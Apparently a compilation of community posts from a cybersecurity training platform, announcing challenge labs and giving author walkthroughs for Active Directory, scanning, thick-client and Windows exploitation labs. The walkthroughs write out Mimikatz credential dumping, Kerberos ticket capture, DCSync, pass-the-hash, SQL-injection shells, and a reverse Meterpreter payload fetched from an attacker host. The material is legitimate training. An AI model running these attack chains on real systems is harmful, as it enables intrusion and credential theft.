Introducing The Human Connection Challenge: Season 1
Starting today we will begin releasing a series of all-new Challenge Labs. Each month you’ll be given the chance to showcase your cybersecurity skills across a range of topics and climb the Season 1 Leaderboard, with the chance to win kudos and rewards along the way.Human Connection Challenge: Season 1 – Active Directory Official Walkthrough Guide (Community Version)
Time’s Up! Congratulations to everyone who completed Lab 7: Active Directory from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. This walkthrough uses placeholders for target IPs in brackets, such as <Kali IP>. Simply replace this with the actual IP of your Kali instance or the specific target. Let's get started! Task 1 What is the WS01 token in C:\Users\Administrator\Desktop\token.txt? The credentials panel gives you the following username and password combination for host WS01. offensive\jack.s:!nitialPass33. Use the following command to log in to WS01: xfreerdp /v:<WS01 IP> /u:jack.s /d:offensive +clipboard +drives /drive:home,/home/kali /dynamic-resolution The task asks you for the token in C:\users\Administrator\Desktop, so your first job is to escalate your privileges, since jack.s is only a low-level user. For this, you can transfer SharpUp.exe, found in /home/kali/Desktop/tools. Run all privilege escalation checks with the following command: SharpUp audit This gives you the credentials OffensiveAdmin:It’sBlankAnyway. You can now use the following command to RDP to WS01 as OffensiveAdmin: xfreerdp /v:<WS01 IP> /u:OffensiveAdmin +clipboard +drives /drive:home,/home/kali /dynamic-resolution With admin privileges, you can now read the token in C:\Users\Administrator\Desktop\token.txt. Task 2 What is the SRV01 token in C:\Users\tina.m\Desktop\token.txt? It’s clear from the task that we must get access to user tina.m who can connect to SRV01. With your new administrator privileges on WS01, open a task manager to check for possible user sessions. You’ll see that tina.m has a cmd.exe process running. This means you can now attempt to get their hash or password from memory using Mimikatz. mimikatz.exe privilege::debug sekurlsa::logonpasswords Using the credentials offensive\tina.m:PwdDump1ng1241, you can now log in to SRV01 and get your second token. Task 3 What is the DC token in C:\Users\Administrator\Desktop\token.txt? The last task asks you to connect to the DC, which means you need to become a domain administrator. Use PowerView-Dev.ps1 to enumerate the most common attack paths to Domain Admin. One of them would be unconstrained delegation. . .\PowerView-Dev.ps1 Get-DomainComputer -Unconstrained -Properties dnshostname It seems like SRV01 is trusted for unconstrained delegation. Since you have administrator privileges, you can obtain DC01’s ticket-granting ticket (TGT). First, transfer Rubeus.exe, and MS-RPRN.exe over to SRV01. Then, run Rubeus and monitor for tickets. Rubeus.exe monitor /interval:1 Then, force DC01 to make an SMB connection to SRV01 to grab the ticket. .\MS-RPRN.exe \\dc01.offensive.local \\srv01.offensive.local sed -i "s/ //g" ticket.txt tr -d "\n" < ticket.txt Then, on SRV01, run the following command to pass it. Rubeus.exe ptt /ticket:<formatted base64 encoded ticket> If you did all that correctly, running the command klist would reveal the Kerberos ticket for the machine account DC01$. Now, transfer mimikatz.exe and run the following command: mimikatz.exe lsadump::dcsync /user:administrator This will give you the hash 2c9299e44ee3abcf5c6f9e7938123334. You can now use Metasploit to connect to the DC, as follows: sudo msfconsole use exploit/windows/smb/psexec set smbuser administrator set smbpass aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334 set rhosts <DC IP> exploit Finally, you can drop into a shell and read the token at C:\Users\Administrator\Desktop\token.txt. Tools For this challenge, you’ll use a range of tools including: SharpUp PowerView Rubeus MS-RPRN Metasploit Tips When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application. To learn more about some of the tools used in this lab, take a look at the following collections: Windows Basics Privilege Escalation: Windows Introduction to Metasploit Introduction to Active Directory Attacks Kerberos Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! I hope you enjoyed the challenge!Labs Live Special: The Human Connection Season Finale
Join us for a special Labs Live event celebrating the conclusion of The Human Connection Challenge: Season 1! As we wrap up this highly anticipated challenge, we're hosting a live webinar featuring the one and only Stefan Apostol, the "evil genius" and author behind the labs! The Human Connection Challenge: Season 1 tasked cyber professionals like you with tackling 7 never-before-seen labs covering a range of critical offensive security topics, from Basic OS Skills to Active Directory. It's been an epic season of skill-polishing, resilience-building, and demonstrating expertise within the community. In this session, Stefan will leverage the interactive Labs Live format for episode 7: Active Directory. He'll share his techniques, explain the intended solutions, and answer your burning questions live. Whether you crushed all 7 labs, or tried a couple, this is a unique opportunity to learn directly from the source. Haven't completed the labs yet? There's still time to be a Season 1 Winner! Complete one or more of the seven challenge labs in The Human Connection Challenge: Season 1 collection before the deadline of Monday, 2nd June 2025, to be entered into our exclusive Season Finale Prize Draw. Every lab you complete gives you one entry, so completing all seven gives you seven chances to win incredible prizes. More details here.Human Connection Challenge: Season 1 – Scanning Walkthrough Guide (Official Version)
Time’s Up! Congratulations to everyone who completed Lab 2: Scanning from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab, based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! The goal is to learn, and I hope these notes help clarify any steps and reinforce key concepts for the next challenge. This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. I’ve also used placeholders in some of the commands that would give away an answer directly, so if you see anything enclosed in angle brackets, such as <name server>, please make sure you replace it with the actual value, such as nameserver. With all that considered, let's get started. Overview Task: Identify the name server records of tinytown.bitnet. 1. What is the IP of the first name server for tinytown.bitnet? You’ll first need to open a Terminal on the Kali desktop. Next, you’ll need to query the DNS Server IP (found in the Machines panel) about the tinytown.bitnet domain using the nslookup (Name Server Lookup) tool. You’re specifically looking for NS (Name Server) records, so you can use the -type=ns parameter with nslookup to specify this: nslookup -type=ns tinytown.bitnet [DNS Server IP] The output of this command will return two name servers for the domain labelled with 1 and 2. Your next step is to identify what IP address is associated with the first name server (1). To do this, you can use nslookup along with the name server, domain, and DNS Server IP: nslookup <name server>1.tinytown.bitnet [DNS Server IP] This command will then return an IP address for the name server. 2. What is the IP of the second name server for tinytown.bitnet? As you’ve already identified both name servers, you’ll just need to run the previous command, except with the second (2) name server: nslookup <name server>2.tinytown.bitnet [DNS Server IP] You’ll then find the IP address associated with it. Task: Identify port service information for Target 1. 3. What service version is running on port 53? A network scanning tool like Nmap can help you identify the service version running on a specific port. To do this with Nmap, you can use the -sV option for service detection: nmap -sV [Target 1 IP Address] The output will show what service version is running on port 53. 4. What is the full service banner of port 22? There are a couple of ways to find the full service banner of port 22 – such as with Nmap or Netcat. If you’re using Nmap, you can modify the previous command to include the “banner” script along with the port number: nmap -sV -script=banner [Target 1 IP Address] -p22 The command line will then display the service banner from port 22. You can alternatively use netcat to manually connect to the SSH server. When a client connects, Netcat may present a banner that contains version information. To use Netcat, you’ll need the nc command along with the Target 1 IP address and specify you want to connect to port 22: nc [Target 1 IP Address] 22 When you run this command, the banner appears before the terminal hangs. Task: Identify a token on one of the ports. 5. What is the token? With the previous Nmap command, you initially found that three ports were open on Target 1. However, you’ll need to do a more thorough network scan to find another open port, one not initially found with the previous scans. To do this, you can expand your port scan to cover a much wider range by using Netcat to scan for open ports from 1 through 9000: nc -zvn <Target 1 IP Address> 1-9000 Here, -z will scan for listening services but won’t send any data, -v is verbose mode, which provides more detailed information, and -n tells Netcat not to resolve hostnames via DNS. This command will reveal a fourth open port. Now, you can use Netcat to connect to this port: nc <Target 1 IP Address> <open port> The token will then be displayed in the terminal. Task: Scan the TLS configuration on Target 2. 6. How many protocols are enabled? To scan for SSL/TLS configurations, you can use the sslscan tool. By default, sslscan scans port 443 and will return supported server ciphers, certificate details, and more. You can use sslscan like this: sslscan <Target 2 IP Address> The returned output will be verbose, but you can find and count the number of enabled protocols under the SSL/TLS Protocols subheading. 7. Name an enabled protocol. Using the previous output, name one of the enabled protocols. 8. What exploit are the protocols NOT vulnerable to? Using the same output, scroll down through the results until you find a subheading that’s named after a vulnerability and contains a similar string to: <Protocol> not vulnerable to <vulnerability name> The vulnerability has the same name as the subheading. Task: Identify and extract information from an SMB share on Target 3. 9. What Disk shared directory can you access? To extract information from an SMB (Server Message Block) share, you can use the smbclient tool. First, you’ll need to list the SMB shares on the target using the -L flag (the list/lookup option) with: smbclient -L //<Target 3 IP> You’ll then be prompted for a password, but you can press Enter to skip this. A list of SMB shares will then be displayed, three of which are shown to be a Disk type, so you know the answer will be one of these. You can now begin to go through the list and try to connect to the shares with: smbclient //<Target 3 IP>/<Sharename> However, this time when you’re prompted for a password and you press Enter, you might encounter a message when you try and connect to a share: NT_STATUS_ACCESS_DENIED If you attempt to connect to all shares, you’ll find you can connect to one share without a password. You’ll then be greeted with the following prompt to show the successful connection: smb: \> 10. What is the token stored in the directory? Now that you’re connected, you can execute commands to interact with the SMB share. If you run ls, you’ll find a token.txt file in the current directory. You can then download the file from the share onto your local machine with: get token.txt On the Kali desktop, open the Home folder and the token.txt will be inside. Open this file and find the token. 11. What is the username stored in the directory? After you’ve run ls in the SMB share, you’ll find not only token.txt, but also a file named creds.txt. Use the same command as you just did previously to download the file onto your machine: get creds.txt This file will also be downloaded to the Home folder, where you can find a username and password. Task: Identify open services on Target 3. Task: Connect to Target 3 with the previously found credentials. 12. What is the token stored in the user's /Documents directory? For this final task, you first need to scan the target using Nmap. You’ll find that if you attempt to scan the target without using the -Pn flag, you’ll get a response saying that the host seems down. However, if you run Nmap with -Pn, you’ll find some ports are open: nmap -Pn <Target 3 IP Address> However, the ports returned from this command don’t offer a way to connect to the target. You’ll also need to scan the 6000 most popular ports: nmap -Pn --top-ports 6000 <Target 3 IP Address> These results will now show two additional ports are open regarding the Web Services Management (Wsman) protocol, which is used to communicate with remote machines and execute commands. One of the tools that implement this protocol is Windows Remote Management (WinRM) which is Microsoft’s implementation of Wsman. Knowing this, you can now use Metasploit to interact with the target. In your terminal, run: msfconsole Once loaded, you can use the the following auxiliary module to connect to a system with WinRm enabled and execute a command with: set cmd ls You’ll then need to set the following options, using the credentials you found in the creds.txt file: set username <username> set password <password> set rhosts <Target 3 IP Address> Next, you need to set the cmd option with the command you want to run. If you use the ls command, you’ll be able to find what out files are in the directory you connect to: set cmd ls With all the options set, you can now run the module: run The results of the executed command will be printed on the screen and also saved to a directory, but both show the existence of a token.txt file in the current directory. You can now set the cmd option to type token.txt in Metasploit: set cmd type token.txt Once set, use the run command to send the updated command: run The contents of token.txt will then be displayed on the screen and outputted to a file. Tools For this challenge, you’ll use a range of tools including: Nslookup Nmap Netcat Sslscan Smbclient Metasploit Tips You can use different tools and parameters within those tools to scan for and find information, so don’t be afraid to try out a few different things! If you want to learn more about some of the tools within this lab, take a look at the following collections: Reconnaissance Nmap Infrastructure Hacking Introduction to Metasploit Post Exploitation with Metasploit Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions, as long as you find the answer, you did it – well done! If you found another way to find some of these answers and think there’s a better way to do it, please post them in the comments below! I hope you enjoyed the challenge and I’ll see you for the next one.Cyber Countdown: Day 1
Lab of the Day Every day we’re revisiting a standout lab from the past year—highlighting its impact and the skills it helped build, whilst also introducing you to the experts who built it. To get us started, today’s lab is of course Episode 2 of our Community Challenge -Scanning. In this lab we’ll test your scanning and enumeration skills but other than that, you’ll find limited information available to guide you. Lab author BethHolden, Cyber Security Engineer here at Immersive Labs is passionate about offensive cybersecurity and created this challenge as a little Christmas treat. The lab contains a range of tools which may provide multiple ways to solve the challenge, she’s eager to see how well you fare – good luck! As a reminder, we reward the top performing community members in the following categories: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent 🎁 Spot Prizes In addition, at the end of each month, the lab author will provide a walkthrough to guide you through the lab and share hints, tips and expert advice on how to approach similar labs in the future. We also encourage you to submit your own walkthrough guides to community@immersivelabs.com and we will feature any unique approaches in their own Community Walkthrough Guide. You can read more about Season 1 of the Human Connection Challenge here. To be in with a chance of a prize you have until midnight on Sunday 22nd December 2024 to complete episode 2! To find the lab in the Immersive Labs Platform, Click Exercise > Challenges & Scenarios > The Human Connection Challenge: Season 1 > Scanning 🔔 Don’t miss out – there are 5 more labs to come in this challenge series. Make sure you're following the CHALLENGES Tag to get notified as soon as each one is released. Good Luck!Human Connection Challenge Lab 6: Thick Client Applications Walkthrough Guide (Community Version)
Time’s Up! Congratulations to everyone who completed Lab 6: Thick Client Applications from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP>, <API IP>, or <Thick Client IP>. Simply replace this with the actual IP of your Kali instance or the specific target. Let's get started! Begin this challenge by setting up your Thick Client application with the API’s IP address. Go to the Remote Data Browser folder , right-click configuration.conf, then click Open with Notepad, and replace the original <IP:5000> with <API IP> or <API IP:80>. Task 1 Task 1 requires you to input a token that you’re meant to receive after you first log in to the Remote Data Browser application with the username and password provided in the Credentials panel. However, after logging in, the application doesn’t present any token. Under normal circumstances, when testing Thick Client applications, you’d have tools like ProcMon running while using the application to check for interactions with the file and operating system. In this lab, however, you can simply go back to the Remote Data Browser application’s folder. You’ll see that a token file has been created. Open it to find the token. Task 2 The second task asks for an admin token. However, you can’t access any admin panel through the application’s interface, meaning the role is set on login. First, open Burp Suite Community on your Thick Client machine. Then, set your System Proxy as follows: Go to Proxy settings > Manual proxy setup Toggle Use a proxy server to "on" Set the IP address as 127.0.0.1 Set the port as 8080 After everything is set up, turn on the Intercept feature of Burp Suite and log back into the application. On the login request, right click anywhere in the request panel and click Do intercept > Response to this request. This will result in a successful authentication response. It contains a JWT token that can be used in subsequent requests, the username that was used, and the current user’s role. From the response, you can assume that the API doesn’t tie the role to the session and instead sends it as a parameter to the application. The application then evaluates the role and presents the user with the appropriate panels. Now you can change the role in the response from user to admin. This will reveal a token in the Remote Data Browser application. Task 3 The final task asks for “the secret token in management”. Again, the application doesn’t offer this option. Clicking any of the vehicles, however, results in a Burp Suite request. The application sends this request to the server when selecting the truck option, along with the JWT received during the login phase. Since the vehicle parameter is the only one, you should focus on it for your final challenge. Adding an extra quote (‘) to the vehicle parameter returns the error “SQL query failed”. You can now safely assume this is vulnerable to SQL injection. Copy the original request into a file, retrieve.sqlmap, in your Kali box, and run sqlmap as follows: sqlmap -l retrieve.sqlmap --dump After hitting ENTER a few times (accepting SQLmap’s default options), you’ll be presented with your final token. Tools For this challenge, you’ll use a range of tools including: Burp Suite SQLMap Kali Tips When testing for Thick Client application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they don’t handle inputs securely. So make sure you check all user input forms and any buttons that direct you to different parts of the application. Although not required for this lab, you should always monitor operating and file system interactions and attempt to decompile the app to uncover all possible attack vectors. To learn more about some of the tools used in this lab, take a look at the following collections: Windows Basics Burp Suite Basics SQL Injection Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide!The Human Connection Challenge Lab 5: Windows Official Walkthrough Guide
Time’s Up! Congratulations to everyone who completed Lab 5: Windows from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP> or <Target IP>. Simply replace this with the actual IP of your Kali instance or the specific target. With all that considered, let's get started. Overview This challenge isn’t linear, meaning you can start with any of the targets listed in the Machines panel. This walkthrough will attack them in order, but it’s up to you which one you try first! For privilege escalation techniques, I won’t go through each enumeration step (to keep this walkthrough from being 70 pages long!), I’ll simply talk through the technique that helped escalate privileges. Target 1 As always, when you don’t know anything about a target machine, you Nmap first. nmap -Pn -sVTC -p- <Target 1 IP> Here’s a breakdown of the flags used in this command: -Pn: Skip ping scanning -sVTC: Service (V)ersioning, (T)CP scanning, Default S(C)ripts -p-: All ports (1-65535) Nmap reports that it got a 401 Unauthorized when doing an HTTP GET on port 80 but didn’t get the WWW-Authenticate header. This is not something you generally see because these two usually go hand in hand. Visiting the page confirms the 401 Unauthorized. However, checking the source code reveals the credentials IMLUser:hidd3n. These credentials won’t work for remote desktop protocol (RDP), but they will give you access to server message block (SMB). They’ll also give you access to C. C$ is a hidden share that requires administrator access, but C is a normal share and can be accessed by this user. Listing the Windows directory, the to-backup folder stands out, as it’s the only non-default folder. Browsing it reveals backups of SAM, SYSTEM, and SECURITY hives. These can be transferred offline and reconstructed to obtain local user hashes. get SAM.backup get SECURITY.backup get SYSTEM.backup impacket-secretsdump -sam SAM.backup -security SECURITY.backup -system SYSTEM.backup You can now either pass the hash and log in as administrator, or try to crack it. Both are valid methods, but this is the way to crack it: echo <Administrator Line> > hash john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT And you’ll get the credentials Administrator:blink182. Now you can log in over RDP and get your first token! xfreerdp /v:<Target 1 IP> /u:Administrator /dynamic-resolution +clipboard Target 2 Initial access Nmapping the second target reveals a website titled “Password Manager”. nmap -Pn -sVTC -p- <Target 2 IP> Upon visiting the website, you’ll see its URL is 10.102.38.73. It asks the user to choose a game from a drop-down box and submit their choice. Once a game is selected (such as World of Warcraft), it adds a parameter to the URL, which then becomes http://10.102.38.73/?game=WOW. You can scan this with SQLMap using the following command: sqlmap -u http://<Target 2 IP>/?game=* This will confirm that the target is vulnerable to SQL injection, so you can use the following command to gain code execution on the target host: sqlmap -u http://<Target 2 IP>/?game=* --os-shell With the ability to execute commands on the target system, you can now read the token. Privilege escalation Since the previous shell is limited, you can upload and execute a reverse Meterpreter shell to use all its privilege escalation functions. First, create the Meterpreter shell and serve it over HTTP using Python. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f exe > shell.exe sudo python -m http.server 80 In a different terminal, run your Metasploit listener. sudo msfconsole use multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost <Kali IP> set lport 443 exploit Finally, in your SQLMap’s OS shell, run the following commands to download and trigger your payload: powershell wget http://<Kali IP>/shell.exe -o C:\users\iis-admin\shell.exe C:\users\iis-admin\shell.exe Once you hit enter a second time you’ll get a connection back to your listener. Metasploit has a variety of post-exploitation modules you can try, but the one that will work is exploit/windows/local/service_permissions. Of course, you can do this with PowerUp or any other privilege escalation tool of your choice, but Metasploit just automates the exploitation process better in this case. use exploit/windows/local/service_permissions set session 1 exploit The module will first enumerate all local service permissions. Once it finds one that runs under a higher privilege user and it can modify, it automatically exploits this service and starts a new metasploit session under this new user. You’ll then find the token on the desktop. Target 3 Initial access Nmapping the second target reveals only two running services, SMB and RDP. nmap -Pn -sVTC -p- <Target 3 IP> Enumerating the SMB service reveals that guest access is enabled. The listing also shows a share called Shared. smbclient -L \\\\<Target 3 IP> -U guest smbclient \\\\<Target 3 IP>\\Shared -U guest You should soon reach the file reply.txt, which contains the password for the user IMLUser. With your newly found credentials (IMLUser:Shar3dPass), you can now RDP into the target. xfreerdp /v:<Target 3 IP> /u:IMLUser /p:Shar3dPass /dynamic-resolution You’ll find the first token in a file on the Desktop. Privilege escalation This privilege escalation technique is a rather classic one. After local file enumeration, you can find the Administrator password in C:\Windows\Panther\Unattend.xml and use it to run CMD as administrator and find the final token. Tools For this challenge, you’ll use a range of tools including: Nmap Metasploit Python SQLMap smbclient Tips When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application. To learn more about some of the tools used in this lab, take a look at the following collections: Windows Basics Privilege Escalation: Windows Introduction to Metasploit SQL Injection Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide!The Human Connection Challenge Lab 1: Basic OS Skills – Walkthrough Guide (Community Version)
This is a walkthrough guide written by one of our community members, who offered to give their perspective on the challenge. Interestingly, they approached this challenge by completing some of the tasks in the graphical user interface (GUI) instead of the command line.The Human Connection Challenge: Season 1 Episode 7 Is Now Live!
The 7th and final episode of Season 1 is here! Prove you skills in this Active Directory challenge! Welcome to the seventh instalment of the Human Connection Challenge: Season 1. This lab tests your ability to move around Active Directory and abuse its misconfigurations. As this is a challenge lab, you'll find limited information available to guide you. However, we've recently released the Introduction to Active Directory Attacks collection, where you can learn some of the most common AD attacks. This, combined with our already existing Kerberos collection, should give you all the tools necessary to complete this challenge. If you're new to the challenge, we reward the top-performing community members in the following categories with physical and digital challenge coins: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent 🎁 Spot Prizes What's more, as this is the final episode of the season, we have some awesome prizes up for grabs if you complete one or more challenge lab before the 2nd June (Read more here). When the challenge ends, lab author StefanApostol will provide a walkthrough to guide you through the lab and share hints, tips and expert advice on how to approach this lab, so you can compare notes and learn techniques for the future. You're also very welcome to submit your own walkthrough guides to community@immersivelabs.com because we know that there are multiple methods you take to complete the challenge labs. We'll showcase any unique approaches taken. You can read more about Season 1 of the Human Connection Challenge here. To be in with a chance of a challenge coin you have until midnight on 23:59 BST on Sunday 1st June to complete episode 7! To find the lab in the Immersive Labs Platform, Click Exercise > Challenges & Scenarios > The Human Connection Challenge: Season 1 > Active Directory Good luck! 🤞
